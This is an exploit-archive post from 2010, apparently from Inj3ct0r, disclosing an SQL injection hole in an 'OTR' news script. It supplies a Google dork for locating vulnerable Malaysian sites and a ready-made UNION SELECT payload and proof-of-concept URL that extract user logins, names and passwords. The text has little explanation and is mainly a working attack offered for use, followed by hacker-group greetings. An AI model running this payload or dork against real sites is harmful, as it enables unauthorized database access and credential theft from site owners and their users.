OTR SQL Injection Vulnerability
Posted on 07 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>OTR SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================== OTR SQL Injection Vulnerability =============================== ************************************************************************* | ,---. , . |---. ,---. ,---. ,---. ,---. ,---. , . , | --- | | | | | |---' | | | |---' | | | | `---' `---| `---' `---' ` `---' ` `---' `---`--- ` `---' ************************************************************************* [V] OTR SQL Injection Vulnerability --==[ Author ]==-- [+] Author : v4lc0m87 [+] Contact : valcom87[at]gmail[dot]com [+] Group : INDONESIAN CYBER [+] Site : http://indonesian-cyber.org/ [+] Date : June, 7-2010 [INDONESIA] ************************************************************************* --==[ Details ]==-- [+] Vulnerable : SQL Injection [+] Google Dork : inurl:latestnews.php?id= ontheroad site:com.my +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [-] Exploit : [+] -666/**/union/**/select/**/6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,concat_ws(USR_LOGIN,0x3a,USR_NAME,0x3a,USR_PASSWORD)/**/from/**/user+v4lc0m87-- [-] Remote SQLi p0c : [+] http://127.0.0.1/latestnews.php?id=-666/**/union/**/select/**/6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,concat_ws(USR_LOGIN,0x3a,USR_NAME,0x3a,USR_PASSWORD)/**/from/**/user+v4lc0m87-- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ INDONESIAN-CYBER.ORG [V] Greetz : SaruKusai, MarilynMesum Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601) Bocah tua nakal (mbah l4mpor,awchoy) flyff666 cruz3N petimati spykit v3n0m uzanc kokoh wisdom, blue screen, skutengboy (kalian pasangan yg serasi juga loh, jikakakakakk) [K]urabu[S]aru [RnR] cO2 community and y0u !! [V] BIG THANKZ : DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | IDC # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
